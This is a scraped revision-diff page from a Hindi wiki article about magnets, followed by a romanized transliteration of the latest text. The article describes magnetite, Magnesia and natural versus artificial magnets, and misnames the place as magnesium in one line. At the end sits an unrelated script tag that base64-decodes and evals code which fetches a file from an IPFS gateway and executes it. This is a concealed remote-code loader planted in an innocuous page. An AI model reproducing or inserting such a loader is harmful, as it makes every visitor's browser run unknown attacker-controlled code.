Difference between revisions of "चुम्बक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('(अंग्रेज़ी:Magnet) लगभग 600 ई.पू. एशिया मा...' के साथ नया पन्ना बनाया)
 
 
(8 intermediate revisions by 6 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Magnet) लगभग 600 ई.पू. [[एशिया]] माइनर के '[[मैगनीशिया]]' नामक स्थान में कुछ ऐसे पत्थर पाये गये, जिनमें [[लोहा|लोहे]] के छोटे-छोटे टुकड़ों को अपनी ओर आकर्षित करने के गुण मौजूद थे। ये पर्थर लोहे के एक [[ऑक्साइड]] '[[मैगनेटाइट]]' ( <math>Fe_3 O_4</math>) के थे। चूंकि ये पत्थर मैगनीशिया नामक पर पाये गये, इसलिए इन्हें 'मैगनेट' कहा जाने लगा। मैगनेट को [[हिन्दी]] में 'चुम्बक' कहते है। इसके द्वारा लोहे के टुकड़ेओं को अपनी ओर आकर्षित करने के गुण को [[चुम्बकत्व]] कहते है। चुम्बकों को यदि स्वतंत्रापूर्वक लटका दिया जाये तो सादैव उत्तर-दक्षिण दिशा की ओर संकेतित होते है। प्रकृति में स्वतंत्र रूप से पाये जाने वाले चुम्बकों की आकर्षण शक्ति बहुत कम होती है तथा उनकी कोई निश्चित आकृति नहीं होती। आजकल चुम्बक कृत्रिम विधियों से बनाये जाते हैं तथा ये चुम्बक मुख्यतः कोहे, इस्पात आदि धातुओं के बने होते हैं। इनकी आकर्षण शक्ति अधिक होती है। इन्हें कृत्रिम चुम्बक कहते है।
+
'''चुम्बक''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: ''Magnet'') वह [[पदार्थ]] है, जो [[चुम्बकीय क्षेत्र]] उत्पन्न करता है। चुम्बकीय क्षेत्र अदृश्य होता है। आस-पास के चुम्बकीय पदार्थों को अपनी ओर खींचने एवं दूसरे चुम्बकों को आकर्षित या प्रतिकर्षित करने का गुण इसी के कारण होता है।
  
{{लेख प्रगति
+
*लगभग 600 ई.पू. एशिया माइनर के '[[मैग्नीशियम]]' नामक स्थान में कुछ ऐसे पत्थर पाये गये, जिनमें [[लोहा|लोहे]] के छोटे-छोटे टुकड़ों को अपनी ओर आकर्षित करने के गुण मौजूद थे। ये पत्थर लोहे के एक [[ऑक्साइड]] 'मैगनेटाइट'(Fe<sub>3</sub>O<sub>4</sub>) के थे। चूंकि ये पत्थर मैगनीशिया नामक पर पाये गये, इसलिए इन्हें 'मैगनेट' कहा जाने लगा।
|आधार=
+
*मैगनेट को [[हिन्दी]] में 'चुम्बक' कहते हैं। इसके द्वारा लोहे के टुकड़ों को अपनी ओर आकर्षित करने के गुण को [[चुम्बकत्व]] कहते हैं।
|प्रारम्भिक=प्रारम्भिक1
+
*चुम्बकों को यदि स्वतंत्रापूर्वक लटका दिया जाये तो सदैव उत्तर-दक्षिण दिशा की ओर संकेतित होते हैं।
|माध्यमिक=
+
*प्रकृति में स्वतंत्र रूप से पाये जाने वाले चुम्बकों की आकर्षण शक्ति बहुत कम होती है तथा उनकी कोई निश्चित आकृति नहीं होती।
|पूर्णता=
+
*आजकल चुम्बक कृत्रिम विधियों से बनाये जाते हैं तथा ये चुम्बक मुख्यतः [[लोहा|लोहे]], [[इस्पात]] आदि धातुओं के बने होते हैं। इनकी आकर्षण शक्ति अधिक होती है। इन्हें कृत्रिम चुम्बक कहते हैं।
|शोध=
+
 
}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:भौतिक विज्ञान]]
+
==संबंधित लेख==
[[Category:विज्ञान कोश]]
+
{{भौतिक विज्ञान}}
 +
[[Category:भौतिक विज्ञान]][[Category:विज्ञान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:25, 17 March 2015

chumbak (aangrezi: Magnet) vah padarth hai, jo chumbakiy kshetr utpann karata hai. chumbakiy kshetr adrishy hota hai. as-pas ke chumbakiy padarthoan ko apani or khianchane evan doosare chumbakoan ko akarshit ya pratikarshit karane ka gun isi ke karan hota hai.

  • lagabhag 600 ee.poo. eshiya mainar ke 'maignishiyam' namak sthan mean kuchh aise patthar paye gaye, jinamean lohe ke chhote-chhote tuk doan ko apani or akarshit karane ke gun maujood the. ye patthar lohe ke ek aauksaid 'maiganetait'(Fe3O4) ke the. chooanki ye patthar maiganishiya namak par paye gaye, isalie inhean 'maiganet' kaha jane laga.
  • maiganet ko hindi mean 'chumbak' kahate haian. isake dvara lohe ke tuk doan ko apani or akarshit karane ke gun ko chumbakatv kahate haian.
  • chumbakoan ko yadi svatantrapoorvak lataka diya jaye to sadaiv uttar-dakshin disha ki or sanketit hote haian.
  • prakriti mean svatantr roop se paye jane vale chumbakoan ki akarshan shakti bahut kam hoti hai tatha unaki koee nishchit akriti nahian hoti.
  • ajakal chumbak kritrim vidhiyoan se banaye jate haian tatha ye chumbak mukhyatah lohe, ispat adi dhatuoan ke bane hote haian. inaki akarshan shakti adhik hoti hai. inhean kritrim chumbak kahate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>